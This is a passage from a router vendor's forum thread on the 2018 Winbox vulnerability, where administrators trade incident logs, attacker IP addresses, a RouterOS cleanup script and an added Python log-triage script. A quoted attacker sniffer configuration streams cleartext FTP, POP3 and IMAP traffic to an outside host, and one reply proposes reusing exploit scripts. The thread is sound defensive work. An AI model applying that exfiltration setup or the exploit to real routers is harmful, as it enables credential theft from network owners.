Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 4:15 am
by aswin
2. I have tried to log in to the remote MikroTik with that password but with no success, so I think the problem comes from the hacker allowing only IP 127.0.0.1 to log in with the "sys" account.
And the hacker used a script to disable hard reset, so I just ask: can I use the serial cable to log in? (The infected router is still located in another place.)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
Smart idea. Is he trying to use Winbox to connect and if so how would you route a Winbox connection through a socks proxy?
From kobuki's suggestion, I used http to log in via SOCKS, not Winbox.

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 08, 2018 12:26 pm
by blackzero
***

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 09, 2018 8:59 am
by sporkman
If you're curious how the bug works, this article is a good read:

https://n0p.me/winbox-bug-dissection/

The vulnerability would have been less of a problem if Mik used industry-standard password-hashing methods - since the vulnerability was allowing a remote attacker to download any file, and there's a file with a very weak encryption of the admin password, it makes getting a legit login really easy. If the password were properly encrypted, then the attacker would be out of luck or at best, have to spend lots of effort cracking the password. And the better your password was, the harder to crack...

The bit about how Winbox fetches unsigned DLLs from the router is frightening as hell. You have a signed app (Winbox) grabbing DLLs (unsigned) from the router - imagine what an attacker could do by loading a trojaned DLL onto your Winbox-running PC.

I also saw a new variation on a hacked router today - they had started a packet sniffer watching for ports 20, 21, 110 and 143 traffic and sending it off to a listener on the host 37.1.207.114. Fun trick! Looking for any cleartext passwords I assume. If they were more adventurous, they'd grab 5060 UDP and make some free phone calls too.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 09, 2018 10:25 am
by mrz
Winbox has not fetched DLLs for quite some time now. Do not use old Winbox.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 09, 2018 10:51 am
by sporkman
Winbox has not fetched DLLs for quite some time now. Do not use old Winbox.
Don't tell me, tell the guy that wrote the blog post. He did see it happen in his tcpdump though, I don't think he wrote that more than 3-4 months ago.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 14, 2018 12:11 am
by allstarcomps
Here is the script I wrote to clean up after the IP-socks/user "service" attack hit some of the old routers I have. After cleaning up, it downloads the latest ROS and does a midnight reboot to install the latest ROS and firmware. I do recommend testing in a lab before deploying in production. I did not check for disabled drop rules.
# Keep more log lines in memory so the cleanup and any remaining attacker activity stay visible
/system logging action set memory-lines=1000 [find where name=memory]
# Remove the filter rules the attacker added (commented "port <number>").
# Note: the regex also matches any legitimate rule whose comment contains "port " - review before running.
/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];
# Disable the SOCKS proxy, reset it to defaults and drop the attacker's SOCKS access list
/ip socks set enabled=no port=1080 max-connections=200 connection-idle-timeout=00:02:00;
/ip socks access remove [/ip socks access find];
# Remove the scripts that fetch mikrotik.php or re-enable SOCKS, their scheduler entries and the "service" user
/system script remove [find where source~"mikrotik.php"]
/system script remove [find where source~"socks set enabled=yes"]
/system scheduler remove [find where name~"port"]
/system scheduler remove [find where owner="service"]
/user remove [find name=service]

# Reboot just before midnight; the reboot installs the RouterOS package downloaded below
/system scheduler
add name=midnightReboot on-event="/system reboot \r\
    \ny" start-time=23:59:00
# On the first boot after that: remove both schedulers, upgrade RouterBOARD firmware, reboot once more
/system scheduler
add name=updateFirmware on-event="/system scheduler remove [find where name=\"up\
    dateFirmware\"]\r\
    \n:delay 2s\r\
    \n/system scheduler remove [find where name=\"midnightReboot\"]\r\
    \n/system routerboard upgrade\r\
    \n:delay 10s\r\
    \n/system reboot\r\
    \ny" start-time=startup
# Download (but do not yet install) the latest RouterOS package for this architecture
/system package update download


Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 22, 2018 7:04 pm
by CsXen
Hi.

When will you backport these vulnerability patches to the mipsle branch? I want to upgrade our RB532s and RB133s every time I read these security warnings, but no .npk is available. :)

Best regards: CsXen

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 23, 2018 9:28 am
by normis
Hi.

When will you backport these vulnerability patches to the mipsle branch? I want to upgrade our RB532s and RB133s every time I read these security warnings, but no .npk is available. :)

Best regards: CsXen
The v5 releases are NOT AFFECTED AT ALL. Quote from first post:
from 6.29
Also, use a firewall and you are safe. The vulnerability affects devices without any protection only.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 23, 2018 9:43 am
by npyoung
How do you recover from this attack? We have 40 Dynadishes that are not responding to Winbox. They do respond partially on port 80, but act strangely. No SSL or telnet was enabled on these CPE's , so that approach is out. Any suggestions?

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 23, 2018 4:01 pm
by Deantwo
How do you recover from this attack? We have 40 Dynadishes that are not responding to Winbox. They do respond partially on port 80, but act strangely. No SSL or telnet was enabled on these CPE's , so that approach is out. Any suggestions?
You could use netinstall to reinstall them.
See: https://wiki.mikrotik.com/wiki/Manual:Netinstall

Other than that, you might get better help if you send an e-mail to support.
See: https://mikrotik.com/support

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 23, 2018 4:18 pm
by kobuki
They do respond partially on port 80, but act strangely.

What do you mean by that?

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 23, 2018 5:59 pm
by npyoung
They do respond partially on port 80, but act strangely.

What do you mean by that?
They are responding normally on port 80 now that I've put them behind a NAT, which I think should cut off access by the hacker. But, the username and/or password has been changed. Seems like there was a "service" entry in the users placed by the hack. Anyone know what the password is for that account?

More after hacking away. Most of them respond on port 80, and able to upgrade, turn off SOCKS, remove service user and change password. About 1/4 of them don't respond, indicate wrong user/pass, or show an error on the webpage. Noticed that the webserver from some are trying to place malicious code.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 23, 2018 8:30 pm
by npyoung
How do you recover from this attack? We have 40 Dynadishes that are not responding to Winbox. They do respond partially on port 80, but act strangely. No SSL or telnet was enabled on these CPE's , so that approach is out. Any suggestions?
You could use netinstall to reinstall them.
See: https://wiki.mikrotik.com/wiki/Manual:Netinstall

Other than that, you might get better help if you send an e-mail to support.
See: https://mikrotik.com/support
Already did. Thanks for the heads up on Netinstall.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 24, 2018 11:22 am
by CsXen
When will you backport these vulnerability patches to the mipsle branch? I want to upgrade our RB532s and RB133s every time I read these security warnings, but no .npk is available. :)
The v5 releases are NOT AFFECTED AT ALL. Quote from first post:
from 6.29

Don't forget, the last version was routeros-mipsle-6.33.5 on the MIPSLE branch, which is vulnerable. So must I downgrade to prior to 6.29 to be safe?
(I can't firewall winbox port, because it must access from anywhere, from mobile or wired internet too. And I can't predict source IP... geoblocking would be a good solution. :) )

Best regards: CsXen

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 24, 2018 11:31 am
by mrz
Use VPN (like Ipsec) to connect to the router and allow Winbox access only from VPN.

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 25, 2018 6:22 am
by npyoung
They do respond partially on port 80, but act strangely.

What do you mean by that?
They are responding normally on port 80 now that I've put them behind a NAT, which I think should cut off access by the hacker. But, the username and/or password has been changed. Seems like there was a "service" entry in the users placed by the hack. Anyone know what the password is for that account?

More after hacking away. Most of them respond on port 80, and able to upgrade, turn off SOCKS, remove service user and change password. About 1/4 of them don't respond, indicate wrong user/pass, or show an error on the webpage. Noticed that the webserver from some are trying to place malicious code.
But wait, there's more. After three days of cutting the infected devices off from the mother ship (killing all incoming direct connections using NAT), most of the Dynadishes that wouldn't allow remote access to fix will respond favorably to Netinstall. However, I did run into one today that was rebooting cyclically in such a way that it wouldn't respond to power off, press reset, power on to put it in Netinstall mode. So, one scrap.

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 25, 2018 7:15 am
by mistry7
If the hacker has left the devices with old software, you can use the same holes to get the set password; there are some Python scripts available as proof of concept.

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 25, 2018 6:02 pm
by npyoung
If the hacker has left the devices with old software, you can use the same holes to get the set password; there are some Python scripts available as proof of concept.
Problem is that of the Dynadishes that are the hard nuts to crack (i.e. not responding to Winbox as it's disabled by the hack, http doesn't work enough to get in, ssh and telnet turned off), there's no remote access to work with. It's interesting that some of these dishes, when presumably cut off from access to the mother ship by NAT, degrade to cyclically rebooting every minute or so, and some others seem to respond to a reboot and are nominally still running, even though they are infected.

BTW, what MT says about cleaning off the setup with a new one, absolutely true. Upgrading, changing passwords and rewinding the obvious stuff (second user "service", turning off SOCKS) just results in SOCKS being turned back on, and in the case of one router (in a remote area, wireless interface, which makes it hard to clean remotely), it went right back to a state where it cannot be connected to.

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 25, 2018 6:42 pm
by npyoung
Has anyone documented exactly what the hack does? Is it possible to expunge it completely without overwriting the device with a new clean restore file? When it comes to CPEs, the wireless interface precludes doing this remotely, as its MAC doesn't match up with the MAC that the clean restore was generated on.

BTW, MT, feel free to jump in here. Perhaps some software to clean the attack off of infected devices?

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 8:47 am
by normis
Has anyone documented exactly what the hack does? Is it possible to expunge it completely without overwriting the device with a new clean restore file? When it comes to CPEs, the wireless interface precludes doing this remotely, as its MAC doesn't match up with the MAC that the clean restore was generated on.

BTW, MT, feel free to jump in here. Perhaps some software to clean the attack off of infected devices?
Using the vulnerability described in the first post, somebody could get your password in clear text, if you had unprotected access to Winbox.
When the person has your password, there are any number of things he could do. The currently most widespread attack was by somebody who connected to such routers and added a SOCKS proxy configuration that runs some cryptomining script in your web browser, when you hit a not-found 404 webpage.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 9:18 am
by eider
To add to what @normis said - I've observed the same attack with SOCKS also attempting to send mass spam via port 25 (and only port 25) using From field in form of [random username]@[domain name from revdns]. The attack also added script and scheduler to run the script. Script was pointing at /mikrotik.php file, but as far as I can tell, it was empty. Possibly it was removed from attacker's server before I managed to check it or it was not used yet.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 9:29 am
by mkx
Script was pointing at /mikrotik.php file, but as far as I can tell, it was empty. Possibly it was removed from attacker's server before I managed to check it or it was not used yet.
Regarding the empty mikrotik.php ... keep in mind that it's a PHP which gets executed on web server. It could well be that the point of that script on server is to receive data about owned router and after it processes the data (the most important is router's public IP address), it just returns empty page of type text/plain ... so don't get over confident just because local file seems to be empty.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 10:51 am
by UGC
Hello, everyone. I have some ROS 5.26 still running for some reasons. Does this vulnerability affect 5.26?

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 10:53 am
by normis
Hello, everyone. I have some ROS 5.26 still running for some reasons. Does this vulnerability affect 5.26?
No. Like the first post says, it affects only versions 6.26 and above (until the fixed versions, see first post)

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 11:08 am
by UGC
So, there is no need to upgrade it, if I am satisfied how it works?

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 11:15 am
by normis
Yes, but of course, you should do all the precautions regardless.

use a non-standard port and username, implement a firewall and deny access from unknown addresses etc.

Re: Winbox vulnerability: please upgrade

Posted: Mon Aug 27, 2018 11:23 am
by UGC
Yes, I did all the precautions except the port. I will change it now. Thanks for the answer.

Re: Winbox vulnerability: please upgrade

Posted: Tue Aug 28, 2018 3:54 pm
by eider
keep in mind that it's a PHP which gets executed on web server. It could well be that the point of that script on server is to receive data about owned router and after it processes the data (the most important is router's public IP address), it just returns empty page of type text/plain
Yes. Monitoring of actively exploited routers is obvious (in fact there's not even a need for this to be a PHP file, a simple log analyzer would do the job), however the way the script was made, it could allow any commands from this file to be executed on exploited routers.

Re: Winbox vulnerability: please upgrade

Posted: Wed Aug 29, 2018 6:48 pm
by Chupaka
If the hacker has left the devices with old software, you can use the same holes to get the set password; there are some Python scripts available as proof of concept.
Problem is that of the Dynadishes that are the hard nuts to crack (i.e. not responding to Winbox as it's disabled by the hack, http doesn't work enough to get in, ssh and telnet turned off), there's no remote access to work with.
Well, maybe there was MacWinBox access? :)

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 04, 2018 1:48 am
by sunblade
Hello,

Packet sniffer may feed IP 37.1.207.114 with data from attacked router.

[xxx@yyy] /tool sniffer> print
only-headers: no
memory-limit: 100KiB
file-limit: 100KiB
streaming-enabled: yes
streaming-server: 37.1.207.114
filter-stream: yes
filter-interface: all
filter-ip-protocol: tcp,udp
filter-port: ftp-data,ftp,pop3,143,1500,10000



I have found some IP address of machine that was used:

IP: 95.154.216.151

aug/22 21:20:24 system,info,account user admin logged in from 95.154.216.151 via winbox
aug/22 21:20:24 system,info socks acl entry added by admin
aug/22 21:20:24 system,info socks config changed by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info,account user admin logged out from 95.154.216.151 via winbox
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:54 system,info script removed from scheduler by admin
aug/22 21:20:54 system,info filter rule changed by admin
aug/22 21:20:54 system,info script removed by admin
aug/22 21:20:54 system,info script removed from scheduler by admin
aug/22 21:20:54 system,info script removed by admin
***

IP: 198.100.28.129

aug/28 00:50:48 system,info,account user admin logged in from 198.100.28.129 via ssh
aug/28 00:51:12 system,info item changed by admin
aug/28 00:51:20 system,info item changed by admin
aug/28 00:51:27 system,info item changed by admin
aug/28 00:51:44 system,info,account user admin logged out from 198.100.28.129 via ssh
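An added triage example, not from this thread or from MikroTik: a Python script that reads RouterOS log lines like the ones above and flags the pattern both sessions show, a login from an address outside a management allow-list, followed within seconds by SOCKS, script, scheduler and filter-rule changes under the same account. The sample input is the two sessions quoted above plus one constructed benign SSH session; the allow-list entry 10.99.0.5 and the 60-second window are assumptions, not values from the thread. The parser accepts both timestamp shapes RouterOS emits (`aug/22 21:20:24` and `Jul/28/2018 08:12:46`).

```python
"""Triage RouterOS log lines for the compromise pattern reported in this thread:
a login from an address outside the management allow-list, followed within
seconds by SOCKS, script, scheduler and firewall changes made under that user."""
import re
from datetime import datetime

# Sample input: the two sessions quoted from the post above, plus one constructed
# benign SSH session from an assumed management host (10.99.0.5).
SAMPLE_LOG = """\
aug/22 21:20:24 system,info,account user admin logged in from 95.154.216.151 via winbox
aug/22 21:20:24 system,info socks acl entry added by admin
aug/22 21:20:24 system,info socks config changed by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info,account user admin logged out from 95.154.216.151 via winbox
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:54 system,info script removed from scheduler by admin
aug/22 21:20:54 system,info filter rule changed by admin
aug/22 21:20:54 system,info script removed by admin
aug/22 21:20:54 system,info script removed from scheduler by admin
aug/22 21:20:54 system,info script removed by admin
aug/28 00:50:48 system,info,account user admin logged in from 198.100.28.129 via ssh
aug/28 00:51:12 system,info item changed by admin
aug/28 00:51:44 system,info,account user admin logged out from 198.100.28.129 via ssh
aug/29 09:05:10 system,info,account user admin logged in from 10.99.0.5 via ssh
aug/29 09:07:42 system,info item changed by admin
aug/29 09:08:01 system,info,account user admin logged out from 10.99.0.5 via ssh
"""

MGMT_ALLOWLIST = {"10.99.0.5"}  # assumed management address; replace with your own

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<topics>\S+) (?P<msg>.*)$")
LOGIN_RE = re.compile(r"^user (?P<user>\S+) logged (?P<dir>in|out) from (?P<ip>\S+) via (?P<svc>\S+)$")
# Configuration changes the botnet made after logging in, as seen in the thread.
CHANGE_RE = re.compile(
    r"^(?:socks (?:acl entry added|config changed)"
    r"|new script (?:added|scheduled)"
    r"|script removed(?: from scheduler)?"
    r"|filter rule changed) by (?P<user>\S+)$"
)


def parse_ts(ts):
    """RouterOS prints 'aug/22 21:20:24' by default and 'Jul/28/2018 08:12:46' when
    the year is shown. Without a year, strptime defaults to 1900, which is fine for
    computing intervals within a single log."""
    for fmt in ("%b/%d/%Y %H:%M:%S", "%b/%d %H:%M:%S"):
        try:
            return datetime.strptime(ts, fmt)
        except ValueError:
            continue
    raise ValueError(f"unrecognised RouterOS timestamp: {ts!r}")


def triage(log_text, allowlist, window_seconds=60):
    """Return one finding per login from outside `allowlist`. Config changes made
    under the same user within `window_seconds` of the login are attached to it even
    after the logout line, because the attacker's changes continued past logout."""
    sessions, latest = [], {}
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ts, msg = parse_ts(m.group("ts")), m.group("msg")
        lm = LOGIN_RE.match(msg)
        if lm:
            if lm.group("dir") == "in":
                s = {"user": lm.group("user"), "ip": lm.group("ip"),
                     "via": lm.group("svc"), "login": ts, "changes": []}
                sessions.append(s)
                latest[s["user"]] = s
            continue
        cm = CHANGE_RE.match(msg)
        if cm and cm.group("user") in latest:
            s = latest[cm.group("user")]
            if 0 <= (ts - s["login"]).total_seconds() <= window_seconds:
                s["changes"].append((ts, msg))
    findings = []
    for s in sessions:
        if s["ip"] in allowlist:
            continue
        span = (s["changes"][-1][0] - s["login"]).total_seconds() if s["changes"] else 0
        findings.append({**s, "span_seconds": span,
                         "severity": "high" if s["changes"] else "medium"})
    return findings


def report(findings):
    """One human-readable line per finding, e.g. for a ticket."""
    return [f"{f['severity'].upper()}: {f['user']} from {f['ip']} via {f['via']} "
            f"at {f['login']:%b/%d %H:%M:%S}: {len(f['changes'])} config changes "
            f"within {f['span_seconds']:.0f}s"
            for f in findings]


if __name__ == "__main__":
    for line in report(triage(SAMPLE_LOG, MGMT_ALLOWLIST)):
        print(line)
```

A session from outside the allow-list with no recognised changes is still reported (as medium), since "item changed" is too generic to match and a foreign login on a management service is worth a look on its own. Eight changes logged in the same second as the login is tooling, not a person clicking through Winbox.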

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 04, 2018 8:05 am
by Jotne
aug/22 21:20:24 system,info socks acl entry added by admin
aug/28 00:51:27 system,info item changed by admin
Think how much easier it would be to debug this if MikroTik logged all commands done on the router.
Please MT do like other network vendor, make all commands visible in the log.
On Cisco you can get it from AAA (Tacacs), which several have requested, or using syslog.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 1:23 am
by rwf
BrianHiggins,
I seemed to find it only on routers running Hotspot.



One interesting thing I noted was that the only routers I found compromised were also routers running additional services or with NAT rules exposing services. I'm guessing they didn't scan for 8291, they instead scanned for something else to build the list of IPs to target. every single router that was otherwise locked down without any services beside 8291 exposed regardless of build number remained uncompromised. Might just be a coincidence, but was worth noting.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 3:04 pm
by indnti
If you're curious how the bug works, this article is a good read:
https://n0p.me/winbox-bug-dissection/
This article, or rather the new vulnerability CVE-2018-14847, makes me afraid of using any MikroTik product anymore

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 3:25 pm
by normis
If you're curious how the bug works, this article is a good read:
https://n0p.me/winbox-bug-dissection/
This article, or rather the new vulnerability CVE-2018-14847, makes me afraid of using any MikroTik product anymore
There is no new vulnerability, it is all the same old. It is in one of the first sentences of that article.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 4:15 pm
by blimbach
Currently heise.de writes about attacks on Mikrotik-Devices. Maybe you can correct something on the part of Mikrotik,
because the news does not sound good.

https://www.heise.de/security/meldung/S ... 55288.html

They refer to the following security audit:

https://blog.netlab.360.com/7500-mikrot ... -yours-en/

BR
Boris

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 4:19 pm
by normis
Boris, did you read the first post in this thread? Did you read the blog entry?
https://blog.mikrotik.com/security/winb ... ility.html

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 4:26 pm
by blimbach
Boris, did you read the first post in this thread? Did you read the blog entry?
https://blog.mikrotik.com/security/winb ... ility.html
Hello Normis, I think I have read and understood all available information. Nevertheless, heise.de reports as if the security fix by mikrotik is at least questionable.

My post was not a complaint. I just wanted to point out this - possibly false - reporting.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 4:28 pm
by normis
I have contacted them on behalf of MikroTik. Let's see if it helps

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 4:48 pm
by bsiege
This article, or rather the new vulnerability CVE-2018-14847, makes me afraid of using any MikroTik product anymore

There is no new vulnerability, it is all the same old. It is in one of the first sentences of that article.
What's new in 6.42.7 (2018-Aug-17 09:48):
MAJOR CHANGES IN v6.42.7:
----------------------
!) security - fixed vulnerabilities CVE-2018-1156, CVE-2018-1157, CVE-2018-1158, CVE-2018-1159;
----------------------
Normally new flaw = new CVE. Be careful to verify!

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 5:05 pm
by BartoszP
...
This article, or rather the new vulnerability CVE-2018-14847, makes me afraid of using any MikroTik product anymore
I have looked here https://tools.cisco.com/security/center ... nListing.x and I'm wondering who uses these products?
And you are lucky if you have software upgrade plan active :-)

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 5:24 pm
by kobuki
Currently heise.de writes about attacks on Mikrotik-Devices. Maybe you can correct something on the part of Mikrotik,
because the news does not sound good.

https://www.heise.de/security/meldung/S ... 55288.html
It looks like a clickbait, smelling pile of misinformational crap. They better fix the bullshitting there.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 5:37 pm
by msatter
I am deeply disappointed by Heise for not investigating further for themselves and inquiring with Mikrotik. I had high regard for Heise as a reliable and trustworthy news source.

That they neglected the bugfix version and declared any version below 6.42.x as unsafe, that Heise made this blunder, is shocking.

They have now made an update to the news item to correct some errors made by them.

Update: in the update it seems that Mikrotik has no love for the bugfix version because it is not mentioned at all! Be complete in your communications! I keep repeating that.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 2:22 am
by schadom
I am deeply disappointed by Heise for not investigating further for themselves and inquiring with Mikrotik. I had high regard for Heise as a reliable and trustworthy news source.

That they neglected the bugfix version and declared any version below 6.42.x as unsafe, that Heise made this blunder, is shocking.

They have now made an update to the news item to correct some errors made by them.

Update: in the update it seems that Mikrotik has no love for the bugfix version because it is not mentioned at all! Be complete in your communications! I keep repeating that.

And I'm deeply concerned by the thousands of admins and Mikrotik-customers, which evidently were unable to shield their Winbox, Webfig, Telnet and SSH management ports from the global internet, despite numerous warnings in the forums and wiki. I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default. Additionally red warning messages and confirmation popups ("Are you really sure?") should be added to Winbox/Webfig, for example if someone tries to configure Winbox/Webfig/Telnet/SSH to be reachable from 0.0.0.0/0 instead of a specific host, networks or RFC1918. Also password complexity could be enforced by default.

Unlike other vendors products like Cisco, Juniper, etc., Mikrotik's products are (more or less) targeted towards smaller environments, home setups and CPEs or WISPs, where people often are not even familiar with basic security principles or are just very lazy. While I agree it's not Mikrotik's job to educate those people regarding security, the outcome of people's laziness and lack of knowledge could at some point in the future hit us all very badly - eg. Mirai a few months ago.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 4:21 am
by msatter
On how to warn users of Mikrotik products to update, I already made constructive remarks, and when they are up to it, or are forced to be up to it, it will happen.

Let's start small and first get the correct information to the users. Today I again see that lacking, in completeness and in the drive to get all the information out, in a way that users don't get the impression that it is inaccurate and that the information from Mikrotik is not taken seriously any more. The result is there to see in the news, and not only with Heise.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 10:51 am
by mrz
I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default.
Be more specific what exactly is not secure? Default firewall is as secure as it can be, only ICMP is allowed on WAN port.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 11:28 am
by mkx
I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default.
Be more specific what exactly is not secure? Default firewall is as secure as it can be, only ICMP is allowed on WAN port.
The problem is upgrading say 6-year old RBs. FW rules don't get updated even if user never touched those. And 6-year old firewall rules are not that safe. I have no idea how to automatically upgrade firewall rules when better defaults in ROS exist.

Another problem is when a user installs the ipv6 package. The firewall list is empty unless one resets the whole configuration. Which is a nuisance (backup is no good, an export of the config should be done, the configuration has to be reset and the exported config imported again) and the user has to be aware of this. It would be much better if, in this case, the ipv6 config were reset to ROS defaults upon installation of the package (old config is non-existent in this case).

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 3:07 pm
by Deantwo
I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default.
Be more specific what exactly is not secure? Default firewall is as secure as it can be, only ICMP is allowed on WAN port.
The problem is upgrading say 6-year old RBs. FW rules don't get updated even if user never touched those. And 6-year old firewall rules are not that safe. I have no idea how to automatically upgrade firewall rules when better defaults in ROS exist.
6 year old default firewall rules aren't secure enough? What do you expect MikroTik to do about that now?
MikroTik already updated the default firewall rules more than a year ago.
They can't change how they made stuff 6 years ago unless they have a time machine (and you guys don't, right?).

If you want the newer default firewall rules, you just take a spare router, upgrade it to the latest RouterOS version, reset the configuration to default, and then you just copy the firewall rules from it onto your older routers.
You can also reset your router to the newer default configuration and then build a new configuration up around that.
Or even better, read the manual about how to secure your router: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 3:18 pm
by mrz
unless they have a time machine (and you guys don't, right?).
We are working on it.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 4:27 pm
by mkx
6 year old default firewall rules aren't secure enough? What do you expect MikroTik to do about that now?
MikroTik already updated the default firewall rules more than a year ago.
They can't change how they made stuff 6 years ago unless they have a time machine (and you guys don't, right?).

If you want the newer default firewall rules, you just take a spare router, upgrade it to the latest RouterOS version, reset the configuration to default, and then you just copy the firewall rules from it onto your older routers.
You can also reset your router to the newer default configuration and then build a new configuration up around that.
Or even better, read the manual about how to secure your router: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
@Deantwo: you largely misinterpreted what I wrote in my post.

The biggest problem with recent (well, in the last two years or so) vulnerabilities in ROS is that old default settings did not rigorously close all WAN access to the RB. And then most users (apart from a small number of professionals, and not even all professionals) don't upgrade ROS regularly. And even if they do, they expect that this is enough, but now we know that old FW rules are not good enough. The vast majority of users (quite a few "professionals" included) are too ignorant to grasp the need for constant improvement of their setup (don't fix it if it ain't broken). Most home users don't have a spare RB (of exactly the same type, to make the transition bearable) so that they can reset the config, configure from scratch and put it in production.

It just doesn't work for the crowd, the same crowd that will probably never upgrade ROS anyway, and because of the same crowd articles about massively compromised routerboards will pop up in the press for quite some time to come...

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 4:47 pm
by normis
ROS is that old default settings
That is not correct. Since beginning of default firewall, it protects the default wan port. The issue is that some people want to make VPN in their home router, so they turn off the firewall.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 4:49 pm
by sid5632
unless they have a time machine (and you guys don't, right?).
We are working on it.
Yeah, but when will it be released?
1985?

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 4:50 pm
by mrz
Actually old firewall protected router just fine. Users ef-ed up configuration and did not adjust firewall accordingly.
Of course we will think about improvements, but there will always be the case when somebody change something and complain that router is not secure.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 6:08 pm
by Deantwo
Actually old firewall protected router just fine. Users ef-ed up configuration and did not adjust firewall accordingly.
Of course we will think about improvements, but there will always be the case when somebody change something and complain that router is not secure.
Yeah, if a guide starts by saying "remove the default configuration", you likely need to rethink your choice of configuration guide.

The manual's guide on securing your router taught me a thing or two as well. Very useful.
See: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

Re: Winbox vulnerability: please upgrade

Posted: Fri Sep 07, 2018 1:37 am
by schadom
Actually the old firewall protected the router just fine. Users ef-ed up the configuration and did not adjust the firewall accordingly.
Of course we will think about improvements, but there will always be the case where somebody changes something and complains that the router is not secure.

Thanks mrz for all your efforts in making the web more secure.
Here are some suggestions in unsorted order:

- Secure hashing of passwords in .idx files (scrypt, bcrypt, pbkdf2 or at least sha-3)
- Password complexity requirements setting which is enabled and enforced by default
- Warning messages and double-confirmations for enabling access from 0.0.0.0/0
- Bruteforce prevention & temporary lockout for all management ports by default
- Notifications in Winbox or on Winbox startup for critical security updates
- A security announcement mailing list would be very useful
- Automatic security updates (manual opt-in for SoHo devices)

Re: Winbox vulnerability: please upgrade

Posted: Fri Sep 07, 2018 8:41 am
by macgaiver
I just recently remembered that I gave an MT router to my distant relatives; I pre-configured it with just winbox access. That was a year ago. I just got the IP to connect to, and this is what I see:
Jul/28/2018 08:12:46 system,info,account user macgaiver logged in from 95.154.216.151 via winbox
Jul/28/2018 08:12:46 system,info socks config changed by macgaiver
Jul/28/2018 08:12:47 system,info new script added by macgaiver
Jul/28/2018 08:12:48 system,info new script scheduled by macgaiver
Jul/28/2018 08:12:48 system,info new script added by macgaiver
Jul/28/2018 08:12:48 system,info new script scheduled by macgaiver
Jul/28/2018 08:12:48 system,info new script added by macgaiver
Jul/28/2018 08:12:48 system,info new script scheduled by macgaiver
Jul/28/2018 08:12:48 system,info,account user macgaiver logged out from 95.154.216.151 via winbox
